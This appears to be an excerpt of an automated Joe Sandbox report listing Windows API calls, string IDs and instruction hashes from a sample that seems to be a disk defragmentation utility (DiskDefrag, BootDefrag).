                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                    • String ID: C:\$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f60440959189295cd425f4ed1094c27380a597b75a56eb5106b80638b3ca90fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D750: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D750: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b7d0dfdc37c6029d1809ee2af6bf9b154064672585324479e47d4ede9078e07
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76ea21c8fa45cc5a0c53382b0db775d5b5275d38abb4e4b5e38ac425cd2fe3fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9541A672B04310DBD310EF54E981B6BB7F4EB88714F91097EF945A7240D735AC488BAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0042D31C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                    • Instruction ID: 93b085b09f2c4ac2bdbc263637bfa3f203d19d869e2dbc8046dfdb1fcf76ffa8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4693b1930bf57ce9ef75d7503c8f5d038f37f734dc7154d68938e473202b5238
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44311F35A00615CFC320DBB4E9C5A6BB7E0EB45311F5489AAE86ED2351DA34E8848B69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422CFC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                    • String ID: DiskChecked$DiskDefrag
                                                                                                                                                                                                                                                                                    • API String ID: 142774367-2981518532
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DE53
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                    • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                    • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00090068,?,00000008,?,?,00000000,00000000), ref: 004639CC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDevice
                                                                                                                                                                                                                                                                                    • String ID: JD$`=
                                                                                                                                                                                                                                                                                    • API String ID: 2352790924-2424167441
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00432A59
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$tFH
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1887266447
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415EBC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402070$8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2552552646
                                                                                                                                                                                                                                                                                    • Opcode ID: 6384bc0adda1adbdeeaa232fbe6d5e5c44dd02d8d9a91ec8063ab249e187767e
                                                                                                                                                                                                                                                                                    • Instruction ID: 23aea299cf4aedd1e52cc8b362e96f09b4e9ad3ffc0a2f21466a88d2017f33b3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6384bc0adda1adbdeeaa232fbe6d5e5c44dd02d8d9a91ec8063ab249e187767e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C219272204300AFC310DB14DD85F9BB7E8FB88B24F004A2EF55EA22D0DB74A905CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,?,?), ref: 004230DC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                    • Instruction ID: 16e62712f1819d0f9283694aa4ee6730415ba22870223c05465c6e43f049811c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc5b2b4a0769cef6be2e786a124323a306287658ccb6bf050eb8b0b8ec3bf991
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20214D75300A13AFC61CEB39D8998F9F3AAFF88305784422DE91A87251CB247D51CBD4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DF73
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                    • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                    • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                    • Opcode ID: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                    • Instruction ID: 5d073b895f258575d86a17cdac6f59c45116d1a3496c0b5e65ce3dbb7a15869e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B213CB5908301DFC304DF64D985B9ABBE4FF98710F004A2EF45A83290EB74D588CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004029C9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402A11
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 90b17b05424b2c62125107ea6cc347fd3112fc48176a53c09daaf49607d71c2d
                                                                                                                                                                                                                                                                                    • Instruction ID: 67af94f4d0bbb15246a849000ec73e7ae4faebe480045c9460922c1e7266e159
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b17b05424b2c62125107ea6cc347fd3112fc48176a53c09daaf49607d71c2d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11014FB138031422E97576B26F47BEF12458B54B08F10042BFB09B92C2EAEDE482459F
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,BB40E64E,?,?,?,00478D19,000000FF,0045997D,?), ref: 0045CF8C
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000007,00000000,00000003,20000000,00000000), ref: 0045CFE9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                    • String ID: \\?\
                                                                                                                                                                                                                                                                                    • API String ID: 415043291-4282027825
                                                                                                                                                                                                                                                                                    • Opcode ID: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction ID: 901598558c3e4d11bc3258ba10a6420141faa6f62916cefdcf4a46bf13df9223
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f11458c9079e904aa5ae75219691bf0a44569f0ba620e8f6ec4a81eccf33a641
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB1173766083009FE310CB54EC89F5BB7A9FB84721F10492EF959973D0D7789848C795
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 00410404
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1310182199
                                                                                                                                                                                                                                                                                    • Opcode ID: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                    • Instruction ID: 09b5b65d6a19d25cf5f991273958dae6b0a4a0afcd6ef2ce1ca3dc747381d305
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a42f14eec4e704c4dcdb54057e86be65e34abce19af7510991bb57dc56cb9c1c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3114F75200248AFCB30EF2ADC85AC933A4AB54314F11443FAD0DAB392DE79A9458B58
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042F1C6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 79a77201152678a81144e55eba1330838be5272e1844f0c3915291d1357643a1
                                                                                                                                                                                                                                                                                    • Instruction ID: e2c7429d35eb79f017d7d9d53c2d9adddc48fbc63db9da39a1e6c1575c1991e3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79a77201152678a81144e55eba1330838be5272e1844f0c3915291d1357643a1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C01C835740321DBD7209F60DD81B2E77B07F48700FD1087AE905A7290D7B4BC448AAD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                      • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateDriveDrivesInitializeInstanceLogicalTypeUninitialize
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 16435998-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction ID: b0155039b9989220c3f10694d0f533bb6dad7ff0edda0b00871a7334ab537921
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f6a6bfb6f4e756cf92e2c82beab66c23b35661a5f3d38e2fb29b1420d17423
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2901D4B6A183119B8314DF28DCC56AB73A5EB89314B01453FE45AC7251EB78AC84CBCA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D4B8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D4DD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001206,00000000,?), ref: 0040FFA8
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0040FFC7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRedrawSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 1030633669-180763933
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: JD
                                                                                                                                                                                                                                                                                    • API String ID: 9847766-1871045537
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                    • String ID: JD
                                                                                                                                                                                                                                                                                    • API String ID: 2645620995-1871045537
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegOpenKeyW.ADVAPI32(?,SYSTEM\CurrentControlSet\services\BootDefrag), ref: 0041A7F7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 0041A811
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A820: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,?,?,?,00000000,00476569,000000FF,0041A806), ref: 0041A883
